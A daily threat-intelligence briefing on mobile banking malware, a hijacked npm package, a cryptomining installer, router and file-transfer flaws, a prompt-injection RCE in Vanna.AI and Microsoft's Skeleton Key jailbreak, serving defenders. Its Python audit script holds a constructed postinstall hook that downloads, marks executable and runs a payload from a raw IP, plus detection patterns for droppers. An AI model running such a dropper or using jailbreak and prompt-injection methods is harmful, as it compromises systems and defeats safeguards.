
Cyware Daily Threat Intelligence


Daily Threat Briefing Jun 27, 2024

A new Android malware called Snowblind is targeting banking customers in Southeast Asia: it disables the tamper detection built into banking apps and abuses accessibility services, leaving victims exposed to financial fraud. Meanwhile, the 8220 Gang has added k4spreader to its arsenal, a new installer written in CGO mode that establishes persistence, downloads and updates itself, and drops further payloads such as the Tsunami botnet and the PwnRig miner.

On the vulnerability front, Microsoft warned of a new jailbreak technique dubbed Skeleton Key that lets adversaries manipulate AI models: a multi-turn strategy overrides a model's guardrails so that it produces forbidden content or makes decisions it was designed to refuse.

Top Malware Reported in the Last 24 Hours

New threat to mobile banking

A new malware called Snowblind is targeting banking customers in Southeast Asia, resulting in financial losses and fraud. Snowblind uses a novel technique that disables the targeted Android banking apps' ability to detect that they have been tampered with, so the modified app keeps running as if it were intact and the malware is hard to spot. It then abuses Android's accessibility services, which are designed to help users with disabilities operate their devices, to interact with the apps on the victim's behalf.

Hidden backdoor in NPM package

ReversingLabs found a malicious npm package called "legacyreact-aws-s3-typescript" aimed at AWS users. The malicious versions of the package (1.1.9, 1.2.1, 1.2.2, and 1.2.4) contained a post-install script that downloaded and executed a second-stage ELF file, a simple backdoor that connected to a malicious IP address. The malicious versions were published several months after the original versions, suggesting the package was hijacked by a malicious actor rather than created as a lure.
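The attack above rides on npm's install-time lifecycle hooks (preinstall, install, postinstall), which run automatically during `npm install`. The script below is an added example, not ReversingLabs' tooling or anything from the package itself: it audits a package.json for install hooks that download, mark executable, or evaluate remote content. The two manifests are constructed for this example and do not reproduce the real package's contents; the heuristics are a starting list, not an exhaustive one.

```python
import re

# Lifecycle hooks that npm runs without any further user action.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristics for install hooks that look like droppers. Constructed for this
# example; extend to taste. Each entry: (regex, human-readable reason).
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "downloads a remote resource"),
    (r"\bchmod\s+\+?x\b|\bchmod\s+[0-7]*7[0-7]*\b", "marks a file executable"),
    (r"\bnode\s+-e\b", "evaluates inline JavaScript"),
    (r"\b(bash|sh)\s+-c\b|\|\s*(bash|sh)\b", "pipes or passes a string to a shell"),
    (r"\b(\d{1,3}\.){3}\d{1,3}\b", "references a raw IP address"),
    (r"\bbase64\b", "decodes base64 data"),
    (r"/tmp/|\$HOME|~/", "writes outside the package directory"),
]


def audit_install_scripts(package_json: dict) -> list[dict]:
    """Return one finding per suspicious pattern found in an install hook.

    Each finding records the hook name, the reason it was flagged and the
    offending command so a reviewer can see exactly what would have run.
    """
    findings = []
    scripts = package_json.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, cmd):
                findings.append({"hook": hook, "reason": why, "script": cmd})
    return findings


# Constructed manifests: a benign release and a later "hijacked" one that
# adds a dropper as a postinstall hook. Names, versions and the IP are made up.
CLEAN = {
    "name": "example-s3-helper",
    "version": "1.1.8",
    "scripts": {"build": "tsc", "test": "jest"},
}
SUSPECT = {
    "name": "example-s3-helper",
    "version": "1.1.9",
    "scripts": {
        "build": "tsc",
        "postinstall": "curl -s http://203.0.113.10/agent -o /tmp/.a "
                       "&& chmod +x /tmp/.a && /tmp/.a",
    },
}

if __name__ == "__main__":
    for manifest in (CLEAN, SUSPECT):
        hits = audit_install_scripts(manifest)
        print(f"{manifest['name']}@{manifest['version']}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  [{h['hook']}] {h['reason']}: {h['script']}")
```

Run this over the package.json of every dependency in a lockfile before installation, or diff it between the version you last reviewed and the one you are about to pull, since the hijacked versions here differed from the originals precisely in that hook. For a blanket control, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops npm from running these hooks at all; packages that genuinely need them can then be allowlisted and run explicitly.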

Cryptomining gang updates its arsenal

XLab researchers spotted k4spreader, a new tool from the "8220" cryptomining gang; the tool was first observed in February 2024. It is an installer written in CGO mode that establishes system persistence, downloads and updates itself, and drops other malware for execution. The gang uses it to deploy payloads such as the Tsunami botnet and the PwnRig miner, and it can also disable the host firewall and kill competing malicious processes.

Top Vulnerabilities Reported in the Last 24 Hours

Skeletons in your AI closet?

Microsoft shared its findings about a new jailbreak attack on AI models called Skeleton Key. The attack uses a multi-turn strategy to override a model's guardrails; once they are bypassed, the model can be made to produce forbidden content or to take decisions that go against its intended rules. Skeleton Key relies on the attacker having legitimate access to the AI model.

A dozen flaws in TP-Link Omada

Cisco Talos researchers found twelve unique vulnerabilities in the TP-Link Omada system, a widely used software-defined networking solution for SMBs. The flaws lie in various functions of specific TP-Link devices, including wireless access points, gigabit VPN routers, and the Omada software controller, and can lead to remote code execution, denial of service, arbitrary command execution, and resetting a device to factory settings.

AI library at risk via prompt injection

Researchers at JFrog uncovered a high-severity security flaw (CVE-2024-5565) in the Vanna.AI library, a Python-based machine learning tool that lets users query SQL databases in natural language. The vulnerability, which carries a CVSS score of 8.1, could be exploited to achieve RCE through prompt injection. It specifically affects the "ask" function in Vanna.AI, which uses a large language model (LLM) to translate a user prompt into a SQL query.

PoC exploit out for Fortra FileCatalyst Workflow

A critical SQL injection vulnerability (CVE-2024-5276) was recently discovered in Fortra FileCatalyst Workflow, a component of the FileCatalyst enterprise file transfer solution. The flaw lets attackers create administrative user accounts, modify and delete data in the application database, and potentially take full control of vulnerable systems. Tenable has published a PoC exploit for it. The vulnerability affects FileCatalyst Workflow versions up to and including 5.1.6 Build 135.
